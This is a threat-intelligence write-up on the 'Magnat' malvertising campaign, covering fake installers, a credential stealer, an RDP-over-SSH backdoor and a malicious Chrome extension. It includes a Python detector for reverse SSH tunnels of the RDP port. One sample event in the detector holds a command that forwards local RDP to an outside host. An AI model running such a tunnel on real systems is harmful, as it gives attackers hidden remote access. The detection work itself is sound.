Magnat, a new threat actor, has been detected spreading various sorts of malware, including backdoors, malicious Chrome extensions, and data stealers. In these attacks, two previously undiscovered malware families are frequently distributed together. These new families are thought to have been created by Magnat.
What is the Story?
Talos researchers have identified malicious activity that targets unwary users by offering bogus installers for popular software.
- This activity consists of a series of malware distribution campaigns that began in late 2018 and have mostly targeted Canada, as well as the United States, Australia, and a few EU nations.
- In these efforts, two undocumented malware families (a backdoor and a Google Chrome extension) are always deployed together.
- These new families are most likely the work of an anonymous actor known only as “magnat,” who has been constantly expanding and upgrading them.
- Financial gain from the sale of stolen credentials, fraudulent transactions, and Remote Desktop access to systems appear to be the attacker’s motives.
Talos recently discovered a malware distribution effort that seeks to dupe users into installing fraudulent versions of popular applications on their computers. We suspect that web advertising is used to target potential victims looking for software to install on their computers. The combination of advertising and bogus software installers is particularly challenging, because the people who are approached by the adverts are already inclined to run an installer.
- The attackers deliver multiple malware families in distribution campaigns that began in late 2018 and mostly targeted Canada, which accounts for around 50% of total infections, followed by Australia, the U.S., and some EU countries.
- The attackers’ motive behind the attack is financial gain by selling stolen credentials, fraudulent transactions, and remote desktop access to systems.
- The campaign uses malvertising as an initial vector to target users interested in downloading popular software.
How can one detect Magnat?
Talos observed that online advertising is used to lure users into executing fake software installers. The combination of fake installers and advertising is harder to detect because the users who click on the ads are already inclined to run an installer on their system.
After the fake installer is run, three pieces of malware are executed on the victim’s machine:
- All credentials on the system are collected by the password stealer.
- The backdoor opens a stealthy Microsoft Remote Desktop session and exposes the system even when it is behind a firewall by forwarding the RDP port through an SSH tunnel.
- The malicious browser extension includes several information-stealing features, including keylogging and screenshots.
Individuals and companies have long been at risk from password stealers. Compromised accounts are frequently sold on underground forums and can lead to additional compromises through password reuse and stolen accounts. This risk is increased by the Chrome extension because it enables the theft of credentials that may not be stored on the system. In addition, the use of an SSH tunnel to forward RDP to an external server provides attackers with a very reliable method of logging into a system remotely.
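One way to hunt for the RDP-over-SSH technique described above is to inspect process-creation telemetry for an SSH client that publishes the local RDP port on a remote host. The following is an added example, not code from the Talos report: it assumes Sysmon-style process-creation records with an image path and command line, and the SSH client names, user-writable directory markers and sample events are all constructed assumptions.

```python
RDP_PORT = 3389
SSH_IMAGES = ("ssh.exe", "plink.exe")  # assumption: common Windows SSH clients
# Assumption: directories where a dropped SSH client would live, unlike a system-installed one.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

# Constructed sample process-creation records, not taken from the Talos report.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\Git\usr\bin\ssh.exe",
     "cmdline": r"ssh.exe -i C:\Users\alice\.ssh\id_rsa git@git.example.com"},
    {"pid": 5531, "image": r"C:\Users\bob\AppData\Local\Temp\ssh.exe",
     "cmdline": r"ssh.exe -N -R 0.0.0.0:20322:127.0.0.1:3389 user@203.0.113.10 -p 443"},
    {"pid": 6012, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r"ssh.exe -L 8080:localhost:80 admin@intranet.example"},
]

def parse_remote_forwards(cmdline):
    """Return (target_host, target_port) for every -R forward in an OpenSSH/plink style command line."""
    tokens = cmdline.split()
    forwards = []
    for i, tok in enumerate(tokens):
        if tok == "-R" and i + 1 < len(tokens):
            spec = tokens[i + 1]
        elif tok.startswith("-R") and len(tok) > 2:
            spec = tok[2:]                      # joined form: -R20322:host:3389
        else:
            continue
        parts = spec.rsplit(":", 2)             # [bind_addr:port or port, host, hostport]
        if len(parts) == 3 and parts[2].isdigit():
            forwards.append((parts[1], int(parts[2])))
    return forwards

def analyze_event(ev):
    """Return (pid, reasons) when an SSH client publishes the local RDP port remotely, else None."""
    image = ev["image"].lower()
    if image.rsplit("\\", 1)[-1] not in SSH_IMAGES:
        return None
    rdp_forwards = [f for f in parse_remote_forwards(ev["cmdline"]) if f[1] == RDP_PORT]
    if not rdp_forwards:
        return None
    reasons = [f"reverse SSH forward exposing {h}:{p} (RDP) on the SSH server" for h, p in rdp_forwards]
    if any(marker in image for marker in USER_WRITABLE):
        reasons.append("SSH client running from a user-writable directory")
    return ev["pid"], reasons

def scan(events):
    """Run the check over process-creation events and return all findings."""
    return [f for f in map(analyze_event, events) if f is not None]
```

Legitimate `-L` local forwards and ordinary SSH logins are ignored, so only a reverse forward that targets the RDP port is reported; a second reason is attached when the client runs from a location a dropper would typically use.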
Enterprises are at risk from Magnat as it delivers multiple payloads. Threats of this nature are sophisticated and require multiple layers of security measures, such as cyber security awareness sessions, network filtering, and endpoint protection, among others.